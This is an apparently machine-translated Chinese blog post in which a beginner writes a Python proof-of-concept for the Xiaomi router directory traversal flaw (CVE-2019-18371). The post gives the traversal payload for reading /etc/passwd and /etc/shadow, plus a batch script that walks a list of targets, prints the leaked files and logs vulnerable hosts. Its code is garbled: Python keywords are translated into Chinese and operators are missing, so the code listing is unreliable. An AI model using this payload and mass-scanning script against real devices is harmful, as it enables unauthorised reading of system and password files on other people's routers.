python漏洞利用,python漏洞扫描器代码
本文主要介绍使用Python编写漏洞验证脚本。本文与您分享一个完整的示例代码。代码简单易懂,对你的学习或工作有一定的参考价值。有需要的朋友可以参考一下。
小白尝试编写任何文件来读取poc。
我是个小白,根本不懂Python,但Python往往是渗透的重要角色。
有一百万个CSDN老板写过这样一句话。不会编程的渗透都是耍流氓。
虽然喜欢,但也想尝试学习写Python漏洞的poc和exp。
我是在网上找到学习方法的,可以直接记录下来。试着写一个poc,用于漏洞的批量验证。
发现小米路由器有一个任意文件读取漏洞,就学会写了。
小米路由器远程任意文件读取漏洞
小米远程任意文件读取漏洞(CVE-2019-18371)
小米路由器Nginx的配置文件错误,导致目录遍历漏洞实现任意文件读取。
可以访问http://domain.cn/xxx…/etc/passwd实现目录遍历访问上级目录及其子目录。
可以通过访问http://192 . 168 . 1 . 1/API-third-party/download/ext disks…/etc/passwd来读取passwd文件。
编写一个poc,用于漏洞的批量验证。
第一步是拼接域名和有效载荷。
payload=/API-third-party/download/ext disks…/etc/passwd已知。
域名和有效载荷拼接如下
导入请求
导入时间
def poc_check(poc):
对于打开的网址( xiaomi.txt):
url=url.replace(\n ,)
url=url poc
Print(poc_url) #将域名和有效载荷拼接成一个完整的域名,然后请求如果返回200,说明存在漏洞。
if __name__==__main__:
POC _ Xiaomi=/API-第三方/download/extdisks./etc/shadow
POC _ check(POC _小米)
图片如下
拼接域名尝试访问,如果返回200,说明访问成功,说明文件可以读取,说明存在漏洞。
返回的其他状态代码表明没有漏洞。
完整的代码如下:
导入请求
导入时间
def poc_check(poc):
对于打开的网址( xiaomi.txt):
url=url.replace(\n ,)
url=url poc
# print(poc_url) #将域名和有效载荷拼接成一个完整的域名,然后请求如果返回200,则存在漏洞。
尝试:
印刷品(《不再留恋夕阳》)
打印(“检测:”)
打印(poc_url)
poc_data=requests.get(poc_url)
如果poc_data.status_code==200:
print(POC _ data . content . decode( utf-8 ))
用open(rxiaomivuln.txt , a )作为f:
f.write(poc_url \n )
f.close()
e:除外
时间.睡眠(0.1)
及格
if __name__==__main__:
POC _ Xiaomi=/API-第三方/download/extdisks./etc/shadow
# POC _ Xiaomi 1=/API-第三方/download/extdisks./etc/passwd
POC _ check(POC _小米)
# poc_check(poc_xiaomi1)
结束了。我太笨了。我是根据别人写的。
关于用Python编写漏洞验证脚本的这篇文章到此为止。有关Python验证脚本的更多信息,请搜索热门IT软件开发工作室之前的文章或继续浏览下面的相关文章。希望大家以后多多支持热门IT软件开发工作室!
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。